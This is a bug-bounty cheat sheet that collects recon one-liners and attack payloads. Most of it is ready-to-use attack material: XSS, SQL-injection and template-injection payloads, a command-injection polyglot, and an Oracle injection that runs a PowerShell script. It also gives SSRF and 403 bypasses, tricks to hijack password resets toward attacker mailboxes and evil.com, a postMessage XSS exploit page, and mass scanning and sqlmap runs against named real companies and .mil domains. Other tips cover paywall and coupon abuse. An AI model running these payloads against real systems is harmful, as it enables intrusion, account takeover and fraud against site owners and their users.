Bug Bounty Tips: | Github | Twitter | Recon | Payload |

Recon

Google the company copyright footer to get more domains.
Use whoxy.com to perform reverse whois lookups with the email used to register the main domain/
Search for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.
Use OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.
Try to recreate data from deleted accounts by siging up with the old email address.
Check text version of HTML e-mail for template injections
When testing Rails Application add .json to url endpoints.
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* 
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/

Subdomain Enumeration

sublist3r -d $1 -o $1.txt
mkdir thirdlevel
echo "Gathering full third-level domain with sublister"
for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done 
echo "Probing for alive third-levels..."
cat final.txt | httprobe > probed.txt

subdomain level extraction

Check live

cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew 

Check live webapps from sublis3r

cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew 

Filter ffuf output

cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl"  | grep -v "FUZZ" | cut -d \" -f4

Tools

Use exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators
Use cloud_enum to find open google buckets or azure accounts 
Use Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'
Use WayBackmachine combined with paraminer or parameth
Passive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey

Payloads

Inject payloads in parameter names, ?<script>alerty</script>=true
Use youtube(olx, etc...) videos with xss in names.
Use round brackets to inject payload into valid e-mail address.
X-Forwarded-For: ${payload}
Use longstring parameters for stacktrace.
WAFBYPASS ?page=";confirm`1`//   Rightwards -> 302; ?pag%65=";confirm`1`//   Rightwards -> 200 + XSS!
Redirect bypass %26next=http://example.com 
When testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path
Add [] to name of parrameter: pwd= ->pwd[]=
when interacting with db try to put % in parameter  ?item=%

Authentication & Autorization

UUID Idor Trick, Register user with the same name, it maybe return uuid.
Try to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo
403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, 
Bypass paywalls by using Google Bot user agent.
User securitytrails.com to find the originating server IP
Do match and replace form false to true.
Set your birthday for today ot tomorrow to get discounts.
Skip steps: /step/shipping ->  ~~/step/payment~~ -> /step/confirm
Check does blackfriday coupon codes expires.
Use blind xss as password.
Login to site using Facebook and try tochange userid during POST requests
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200

Email Restriction bypass

inti(;inti@inti.io;)@whitelisted.com

→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
● inti@inti.io(@whitelisted.com)
● inti+(@whitelisted.com;)@inti.io

Email Address input fuzz

test+(<script>alert(1)</script>)@example.com
test@example(<script>alert(1)</script>).com
"<script>alert(1)</script>"@example.com

"<%=7*7%>"@example.com
test+(${{7*7}})@example.com

"'OR 1=1--"@example.com
"mail');DROP TABLE users;--"@example.com

test@example.burpcollaborator.net
test@[127.0.0.1]

victim&email=attacker@example.com

"%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Account takeover via Email

GET /passwordreset

Double parameter (aka. HPP / HTTP parameter pollution):
email=victim@xyz.tld&email=hacker@xyz.tld
Carbon copy:
email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld
Using separators:
email=victim@xyz.tld,hacker@xyz.tld
email=victim@xyz.tld%20hacker@xyz.tld
email=victim@xyz.tld|hacker@xyz.tld
No domain:
email=victim
No TLD (Top Level Domain):
email=victim@xyz
JSON table:
{"email":["victim@xyz.tld","hacker@xyz.tld"]}

Password Reset:

reset userpassword: user@email.com.burpcolaborator.com

Find GET parameters in example.com

assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

Command injection polyglot

/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/
/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/

SSRF Bypass list for localhost (127.0.0.1):

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

Top 25 SSRF parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Top 25 RCE parameters

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Top 25 LFI parameters

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

HackerOne redirect parameters

/[redirect]
?targetOrigin=[redirect]
?fallback=[redirect]
?query=[redirect]
?redirection_url=[redirect]
?next=[redirect]
?ref_url=[redirect]
?state=[redirect]
?l=[redirect]
?redirect_uri=[redirect]
?forum_reg=[redirect]
?return_to=[redirect]
?redirect_url=[redirect]
?return_url=[redirect]
?host=[redirect]
?url=[redirect]
?redirectto=[redirect]
?return=[redirect]
?prejoin_data=[redirect]
?callback_url=[redirect]
?path=[redirect]
?authorize_callback=[redirect]
?email=[redirect]
?origin=[redirect]
?continue=[redirect]
?domain_name=[redirect]
?redir=[redirect]
?wp_http_referer=[redirect]
?endpoint=[redirect]
?shop=[redirect]
?qpt_question_url=[redirect]
?checkout_url=[redirect]
?ref_url=[redirect]
?redirect_to=[redirect]
?succUrl=[redirect]
?file=[redirect]
?link=[redirect]
?referrer=[redirect]
?recipient=[redirect]
?redirect=[redirect]
?u=[redirect]
?hostname=[redirect]
?returnTo=[redirect]
?return_path=[redirect]
?image=[redirect]
?requestTokenAndRedirect=[redirect]
?retURL=[redirect]
?next_url=[redirect]

MORE PARAMETERS

https://github.com/1ndianl33t/Gf-Patterns

Massive XSS

#!/bin/bash
# $1 => example.domain

subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1

cat domains_subfinder_$1 | tee -a domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt

cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

Masive Top Parameters search

TBA 
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Juicy GoogleDorks

site:example.com inurl:.cgi?

File Upload and what to search

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

File upload chain

../../../tmp/lol.png —> for path traversal
sleep(10)-- -.jpg —> for SQL injection
<svg onload=alert(document.domain)>.jpg/png —> for XSS
; sleep 10; —> for command injections

Find JavaScript Files in Target.com

echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
or
cat domains | httpx -silent | subjs | anew

Extract endpoints from *.js

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

Extract juicy data from js

cat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200 
grep -EHirn "accesskey|admn|aes|api_key|apikey|password|secret|token" ./output --color

403 bypass

https://target.com/admin/ –> HTTP 302 (redirect to login page)
https://target.com/admin..;/ –> HTTP 200 OK

https://target.com/../admin
https://target.com/whatever/..;/admin

site.com/secret –> HTTP 403 Forbidden
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

Data leakage through .json

Here’s a tip to achieve sensitive data leak using .json extension.

Request:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}

Response:
HTTP/1.1 200 OK
Now let’s try this instead:

Request:
GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}

Response:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}

Generate wordlist for target

echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew

Check for SQLi

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'  <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

SQLi in Email parameter

Oracle

1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --
1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null  FROM DUAL --
1' AND 1=1 UNION SELECT null, user FROM DUAL --

Cool BurpPlugins

Autorize – To test BACs (Broken Access Control)
Burp Bounty – Profile-based scanner
Active Scan++ – Add more power to Burp’s Active Scanner
AuthMatrix – Authorization/PrivEsc checks
Broken Link Hijacking – For BLH (Broken Link Hijacking)
Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)
Command Injection Attacker
Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type
Decoder Improved – More decoder features
Freddy – Deserialization
Flow – Better HTTP history
Hackvertor – Handy type conversion
HTTP Request Smuggler
Hunt – Potential vuln identifier
InQL – GraphQL Introspection testing
J2EE Scan – Scanning J2EE apps
JSON/JS Beautifier
JSON Web Token Attacker
ParamMiner – Mine hidden parameters
Reflected File Download Checker
Reflected Parameter – Potential reflection
SAML Raider – SAML testing
Upload Scanner – File upload tester
Web Cache Deception Scanner

Detect framework via favico

cat urls.txt | python3 favfreak.py -o output

Password Poisoning

(1) Normal request:

Request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
Link received:
https://target.com/reset-link=1g2f3guy23g
(2) Basic HHI (Host Header Injection):

Request:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
none
Error 404 - request blocked
(3) Bypass technique:

Request:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
https://evil.com/reset-link=1g2f3guy23g

Find hostsname form given IP

echo 192.168.69.69 | cero

XSS Post Message POC

Vulnerable PostMessage
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>
window.addEventListener("message", (event) => {
console.log(event.data);
$(event.data)
}, false);
</script>


Exploit 
<!DOCTYPE html>
<html>
    <head>
    </head>
<body>
<script>
var myWindow = window.open("http://example.com/test.html")
</script>
<script>
setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000);
window.onmessage = function (e) {
console.log(e);
};
</script>
</body>
</html>

Deserialization

https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://github.com/tyranid/ExploitRemotingService
https://github.com/nccgroup/VulnerableDotNetHTTPRemoting
https://github.com/pwntester/ysoserial.net/blob/master/README.md
https://nickbloor.co.uk/2018/02/28/popping-wordpress/

BBRF SCOPE DoD

bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil'

Xray Oneliner

xargs -a urls.txt -I@ sh -c './xray webscan --plugins cmd-injection,sqldet,xss --url "@" --html-output vuln.html'

Katana crawling

subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent | grep -iE '\.js'| grep -iEv '(\.jsp|\.json)'
subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent -em js,jsp,json

Scan All domains using Knoxss

• [Explained command]

echo "dominio" | subfinder -silent | gau | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh 

Scan All github repo ORG

• [Explained command]

docker run --rm  mswell/masstrufflehog -o paypal

Scan log4j using BBRF and log4j-scan

• Explained command

bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"'

SSTI in qsreplase add "{{7*7}}" (0xJin)

cat subdomains.txt | httpx -silent -status-code | gau --threads 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080

urldedupe bhedak

• [Explained command]

waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'

Hakrawler Airixss XSS

• [Explained command]

echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'

Airixss XSS

• [Explained command]

echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

FREQ XSS

• [Explained command]

echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'

Bhedak

• [Explained command]

cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}"

.bashrc shortcut OFJAAAH

reconjs(){
gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt
}
cert(){
curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew
}
anubis(){
curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
}

Oneliner Haklistgen

• @hakluke

subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done
cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt;

Running JavaScript on each page send to proxy.

• [Explained command]

cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080

Running cariddi to Crawler

• [Explained command]

echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive

Dalfox scan to bugbounty targets.

• [Explained command]

xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'

Dalfox scan to bugbounty targets.

• [Explained command]

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @

Using x8 to Hidden parameters discovery

• [Explaining command]

assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'

Extract .js Subdomains

• [Explaining command]

echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1

goop to search .git files.

• [Explaining command]

xargs -a xss -P10 -I@ sh -c 'goop @'

Using chaos list to enumerate endpoint

curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'

Using Wingman to search XSS reflect / DOM XSS

• [Explaining command]

xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'

Search ASN to metabigor and resolvers domain

• [Explaining command]

echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

OneLiners

Search .json gospider filter anti-burl

• [Explaining command]

gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl

Search .json subdomain

• [Explaining command]

assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 

SonarDNS extract subdomains

• [Explaining command]

wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar

Kxss to search param XSS

• [Explaining command]

echo http://testphp.vulnweb.com/ | waybackurls | kxss

Recon subdomains and gau to search vuls DalFox

• [Explaining command]

assetfinder testphp.vulnweb.com | gau |  dalfox pipe

Recon subdomains and Screenshot to URL using gowitness

• [Explaining command]

assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 

Extract urls to source code comments

• [Explaining command]

cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' 

Axiom recon "complete"

• [Explaining command]

findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u 

Domain subdomain extraction

• [Explaining command]

cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent  -threads 100 | anew httpDomain'

Search .js using

• [Explaining command]

assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew

This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below.

• [Explaining command]

cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt  | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'

My recon automation simple. OFJAAAH.sh

• [Explaining command]

chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1

Download all domains to bounty chaos

• [Explaining command]

curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'

Recon to search SSRF Test

• [Explaining command]

findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://YOUR.burpcollaborator.net

ShuffleDNS to domains in file scan nuclei.

• [Explaining command]

xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1

Search Asn Amass

• [Explaining command]

Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me)

amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''

SQLINJECTION Mass domain file

• [Explaining command]

httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

Using chaos search js

• [Explaining command]

Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com".

chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#]

Search Subdomain using Gospider

• [Explaining command]

GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS

gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

Using gospider to chaos

• [Explaining command]

GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.

chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3'

Using recon.dev and gospider crawler subdomains

• [Explaining command]

We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls.

curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

PSQL - search subdomain using cert.sh

• [Explaining command]

Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs

psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew

Search subdomains using github and httpx

• [Github-search]

Using python3 to search subdomains, httpx filter hosts by up status-code response (200)

./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title

Search SQLINJECTION using qsreplace search syntax error

• [Explained command]

grep "="  .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"

Search subdomains using jldc

• [Explained command]

curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew

Search subdomains in assetfinder using hakrawler spider to search links in content responses

• [Explained command]

assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"

Search subdomains in cert.sh

• [Explained command]

curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew

Search subdomains in cert.sh assetfinder to search in link /.git/HEAD

• [Explained command]

curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Collect js files from hosts up by gospider

• [Explained command]

xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'

Subdomain search Bufferover resolving domain to httpx

• [Explained command]

curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew

Using gargs to gospider search with parallel proccess

• Gargs

• [Explained command]

httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne

Injection xss using qsreplace to urls filter to gospider

• [Explained command]

gospider -S domain.txt -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'

Extract URL's to apk

• [Explained command]

apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"

Chaos to Gospider

• [Explained command]

chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @

Checking invalid certificate

• Real script
• Script King

xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx

Using shodan & Nuclei

• [Explained command]

Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.

